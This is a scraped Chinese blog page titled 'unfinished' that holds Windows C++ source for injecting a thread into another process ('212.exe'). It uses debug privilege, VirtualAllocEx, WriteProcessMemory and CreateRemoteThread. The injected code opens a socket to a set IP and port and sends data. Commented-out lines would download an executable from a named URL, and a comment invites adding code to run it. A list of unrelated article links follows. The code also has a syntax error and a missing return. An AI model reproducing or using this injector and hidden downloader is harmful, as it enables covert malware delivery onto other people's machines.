未完成
来源:互联网 发布:淘宝卖假货 编辑:程序博客网 时间:2024/04/30 17:24
------#include <windows.h>
#include <WINSOCK.H>
#define MAXINJECTSIZE (2048*20)
struct tagDownInfo
{
WSADATA v_wsadata;
SOCKET v_sock;
struct sockaddr_in v_target;
int v_sizesockaddr;
int v_rcvid;
WORD v_VersionRequeste;
TCHAR v_WS2_32_LIB[20];
TCHAR szWSAStartup[100];
TCHAR szSocket[100];
TCHAR szconnect[200];
TCHAR szclosesocket[100];
TCHAR szWSACleanup[100];
TCHAR szsend[100];
char szbuf[255];
TCHAR szGetLastError[20];
TCHAR szUrl[300];
TCHAR szFile[300];
TCHAR szUrlmon[30];
TCHAR szUrlDowndToFile[30];
TCHAR szMessageBox[300];
TCHAR szUser32_lib[30];
bool bIsRun;
DWORD dwRunMode;
FARPROC funFunGetModuleHandleAddr;
FARPROC funFunGetProcAddressAddr;
FARPROC funFunLoadLibraryAddr;
FARPROC funFunGetLastErrorAddr;
};
bool HideDownFile(tagDownInfo* pInfo, DWORD dwProcessId);
DWORD WINAPI ThreadDown(LPVOID lParam)
{
tagDownInfo* pInfo = (tagDownInfo*)lParam;
//*******************************************
//定义SOCKET指针函数原型
typedef int (__stdcall* T_WSAStartup)(WORD,LPWSADATA);
typedef SOCKET (__stdcall* T_socket)(int af,int type,int procotol);
typedef int (__stdcall* T_connect)(SOCKET s,const struct sockaddr FAR * name,int namelen);
typedef int (__stdcall* T_send)(SOCKET s,const char FAR * buf,int len,int flags);
typedef BOOL (__stdcall* T_closesocket)(SOCKET s);
typedef int (__stdcall* T_WSACleanup)(void);
//*******************************************
typedef long (__stdcall* T_MessageBox)(HWND,LPCTSTR,LPCTSTR,DWORD);
typedef long (__stdcall* T_URLDownloadToFile)(LPVOID,LPCTSTR,LPCTSTR,DWORD, LPVOID );
typedef HMODULE (__stdcall* T_GetLastError)(void);
typedef HMODULE (__stdcall* T_GetProcAddress)(HMODULE ,LPCSTR);
typedef HMODULE (__stdcall* T_GetModuleHandle)(LPCTSTR);
typedef HMODULE (__stdcall* T_LoadLibrary)(LPCTSTR);
typedef void (__stdcall* pSleep)( DWORD dwMilliseconds);
//四个重要的函数地址
T_GetModuleHandle pGetModuleHandle = (T_GetModuleHandle)pInfo->funFunGetModuleHandleAddr;
T_GetProcAddress pGetProcAddress = (T_GetProcAddress)pInfo->funFunGetProcAddressAddr;
T_LoadLibrary pLoadLibrary = (T_LoadLibrary)pInfo->funFunLoadLibraryAddr;
T_GetLastError pGetLastError = (T_GetLastError)pInfo->funFunGetLastErrorAddr;
////////////////////////////////////////////////////////////////////////////////////////////////////////////////
//取得messagebox的地址
////////////////////////////////////////////////////////////////////////////////////////////////////////////////
HMODULE hUser32Dll = pLoadLibrary(pInfo->szUser32_lib );
T_MessageBox pMessageBox =(T_MessageBox)pGetProcAddress(hUser32Dll, pInfo->szMessageBox);
//pMessageBox(NULL, pInfo->szUrl, pInfo->szFile, 0);
//判断程序最终正确执行
//HMODULE hDll = pLoadLibrary( pInfo->szUrlmon );
//T_URLDownloadToFile pURLDownloadToFile = (T_URLDownloadToFile)pGetProcAddress( hDll, pInfo->szUrlDowndToFile);
// pURLDownloadToFile(NULL, pInfo->szUrl, pInfo->szFile, 0, NULL);
////////////////////////////////////////////////////////////////////////////////////////////////////////////////
//取得T_WSACleanup的地址
////////////////////////////////////////////////////////////////////////////////////////////////////////////////
HMODULE socklib=pLoadLibrary(pInfo->v_WS2_32_LIB);
if (!socklib)
{
//pMessageBox(NULL, pInfo->v_WS2_32_LIB, pInfo->v_WS2_32_LIB, 0);
return 0;
}
T_WSACleanup pWSACleanup =(T_WSACleanup)pGetProcAddress(socklib, pInfo->szWSACleanup);
if(!pWSACleanup)
{
pMessageBox(NULL, pInfo->szWSACleanup, pInfo->szWSACleanup, 0);
return 0;
}
////////////////////////////////////////////////////////////////////////////////////////////////////////////////
//取得closesocket的地址
////////////////////////////////////////////////////////////////////////////////////////////////////////////////
T_closesocket pclosesocket =(T_closesocket)pGetProcAddress(socklib, pInfo->szclosesocket);
if(!pclosesocket)
{
pMessageBox(NULL, pInfo->szclosesocket, pInfo->szclosesocket, 0);
return 0;
}
////////////////////////////////////////////////////////////////////////////////////////////////////////////////
//取得WSAStartup的地址
////////////////////////////////////////////////////////////////////////////////////////////////////////////////
T_WSAStartup pWSAStartup =(T_WSAStartup)pGetProcAddress(socklib, pInfo->szWSAStartup);
if(!pWSAStartup)
{
//pMessageBox(NULL, pInfo->szWSAStartup, pInfo->szWSAStartup, 0);
return 0;
}
////////////////////////////////////////////////////////////////////////////////////////////////////////////////
//取得socket的地址
////////////////////////////////////////////////////////////////////////////////////////////////////////////////
T_socket psocket =(T_socket)pGetProcAddress(socklib, pInfo->szSocket);
if(!psocket)
{
pMessageBox(NULL, pInfo->szSocket, pInfo->szSocket, 0);
return 0;
}
////////////////////////////////////////////////////////////////////////////////////////////////////////////////
//取得connect的地址
////////////////////////////////////////////////////////////////////////////////////////////////////////////////
T_connect pconnect =(T_connect)pGetProcAddress(socklib, pInfo->szconnect);
if(!pconnect)
{
pMessageBox(NULL, pInfo->szconnect, pInfo->szconnect, 0);
return 0;
}
////////////////////////////////////////////////////////////////////////////////////////////////////////////////
//取得send函数的地址
////////////////////////////////////////////////////////////////////////////////////////////////////////////////
T_send psend =(T_send)pGetProcAddress(socklib, pInfo->szsend);
if(!psend)
{
pMessageBox(NULL, pInfo->szsend, pInfo->szsend, 0);
return 0;
}
////////////////////////////////////////////////////////////////////////////////////////////////////////////////
//SOCKET所有函数 执行
////////////////////////////////////////////////////////////////////////////////////////////////////////////////
pWSAStartup(pInfo->v_VersionRequeste,&pInfo->v_wsadata);
pInfo->v_sock=psocket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if(!pInfo->v_sock)
{
pMessageBox(NULL, pInfo->szSocket, pInfo->szFile, 0);
pclosesocket(pInfo->v_sock);
pWSACleanup();
return 0;
}
pconnect(pInfo->v_sock,(struct sockaddr *)&(pInfo->v_target),pInfo->v_sizesockaddr))
psend(pInfo->v_sock,pInfo->szbuf,256,0);
//pMessageBox(NULL, pInfo->szconnect, pInfo->szconnect, 0);
pclosesocket(pInfo->v_sock);
pWSACleanup();
return 0;
}
//////////////////////////////////////////////////////////////////////////////////////////////////////
//远程函数完毕
//////////////////////////////////////////////////////////////////////////////////////////////////////
bool HideDownFile(tagDownInfo* pInfo, DWORD dwProcessId)
{
HANDLE hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, dwProcessId);
if(hProcess == NULL)
return false;
HINSTANCE hLibDll = GetModuleHandle("Kernel32.dll");
pInfo->funFunGetProcAddressAddr = (FARPROC)GetProcAddress(hLibDll, "GetProcAddress");
pInfo->funFunGetModuleHandleAddr = (FARPROC)GetProcAddress(hLibDll, "GetModuleHandleA");
pInfo->funFunLoadLibraryAddr=(FARPROC)GetProcAddress(hLibDll, "LoadLibraryA");
pInfo->funFunGetLastErrorAddr = (FARPROC)GetProcAddress(hLibDll, "GetLastError");
lstrcpy(pInfo->szUrlmon, "Urlmon.dll");
lstrcpy(pInfo->szUrlDowndToFile, "URLDownloadToFileA");
lstrcpy(pInfo->szMessageBox, "MessageBoxA");
lstrcpy(pInfo->szUser32_lib, "User32.dll");
//********************************************************//
lstrcpy(pInfo->v_WS2_32_LIB,"WS2_32.dll");
lstrcpy(pInfo->szWSAStartup,"WSAStartup");
lstrcpy(pInfo->szSocket,"socket");
lstrcpy(pInfo->szconnect,"connect");
lstrcpy(pInfo->szWSACleanup,"WSACleanup");
lstrcpy(pInfo->szclosesocket,"closesocket");
lstrcpy(pInfo->szsend,"send");
lstrcpy(pInfo->szbuf,"发送成功函数编辑");
pInfo->v_VersionRequeste = MAKEWORD(2,2);
//做SOCKET前的参数准备//
pInfo->v_target.sin_family=AF_INET;
pInfo->v_target.sin_port=htons(999);
pInfo->v_target.sin_addr.s_addr=inet_addr("192.168.1.123");
pInfo->v_sizesockaddr=sizeof(pInfo->v_target);
//做SOCKET前的参数准备 OVER//
//********************************************************//
//分配空间
void *pRemoteThread = VirtualAllocEx(hProcess, 0, MAXINJECTSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (! pRemoteThread)
return false;
tagDownInfo *pData = (tagDownInfo*)VirtualAllocEx(hProcess, 0, sizeof (tagDownInfo), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (!pData)
return false;
if (! WriteProcessMemory(hProcess, pRemoteThread, &ThreadDown, MAXINJECTSIZE, 0))
return false;
if (! WriteProcessMemory(hProcess, pData, pInfo, sizeof (tagDownInfo), 0))
return false;
bool bRet = true;
HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteThread, pData, 0, NULL);
if(!hThread)
bRet = false;
WaitForSingleObject(hThread, INFINITE);
VirtualFreeEx(hProcess, pRemoteThread, MAXINJECTSIZE, MEM_RELEASE);
VirtualFreeEx(hProcess, pData, sizeof (tagDownInfo), MEM_RELEASE);
//自己加上运行程序的代码即可 在其他线程运行也可以就是多加加载 shell32.dll 即可
CloseHandle(hThread);
CloseHandle(hProcess);
return bRet;
}
-----------------------------------------------------------------------
#include <windows.h>
#include "HideDownFile.CPP"
#include "conio.h"
#include <TlHelp32.h>
DWORD processNameToId(LPCTSTR lpszProcessName)
{
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
PROCESSENTRY32 pe;
pe.dwSize = sizeof(PROCESSENTRY32);
if (!Process32First(hSnapshot, &pe)) {
MessageBox(NULL,
"The frist entry of the process list has not been copyied to the buffer",
"Notice", MB_ICONINFORMATION | MB_OK);
return 0;
}
while (Process32Next(hSnapshot, &pe)) {
if (!strcmp(lpszProcessName, pe.szExeFile)) {
return pe.th32ProcessID;
}
}
}
bool enableDebugPriv()
{
HANDLE hToken;
LUID sedebugnameValue;
TOKEN_PRIVILEGES tkp;
if (!OpenProcessToken(GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
return false;
}
if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &sedebugnameValue)) {
CloseHandle(hToken);
return false;
}
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Luid = sedebugnameValue;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if (!AdjustTokenPrivileges(hToken, FALSE, &tkp, sizeof(tkp), NULL, NULL)) {
CloseHandle(hToken);
return false;
}
return true;
}
int main(int argc, char* argv[])
{
enableDebugPriv();
// ===== 获得需要创建REMOTETHREAD的进程句柄 ===============================
char szExeName[MAX_PATH] = { 0 };
strcpy(szExeName, "212.exe");
DWORD dwProcessId = processNameToId(szExeName);
if (dwProcessId == 0) {
MessageBox(NULL, "The target process have not been found !",
"Notice", MB_ICONINFORMATION | MB_OK);
return -1;
}
tagDownInfo info;
ZeroMemory(&info, sizeof(tagDownInfo));
strcpy(info.szFile, "e://1.exe");
strcpy(info.szUrl, "http://www.shineway.com/aspnet/adsl.exe");
HideDownFile(&info, dwProcessId);
return 0;
}
- 未完成
- 未完成
- 未完成
- 未完成
- 未完成
- 未完成
- 未完成
- 未完成
- 未完成
- 未完成
- 未完成
- 未完成
- 未完成
- wifi 未完成
- 单链表未完成
- ioctl (未完成)
- 未完成代码
- contact未完成
- Gaim 下使用 google talk
- 超星PDG格式转换成PDF格式及其它格式
- 数独游戏求解
- 使用C#获取Windows版本(源码)
- 关于句柄
- 未完成
- 罗素 1920年对中国的预言
- 孙鑫VC学习笔记:第十九讲 动态链接库
- Delphi Tips and Articles 3
- 孙鑫VC学习笔记:第二十讲 Hook编程
- 孙鑫VC学习笔记:第二十讲 ado数据库编程
- 到合肥了
- 史上最强的Vim 配置文件(修正版)
- 用API获取内存信息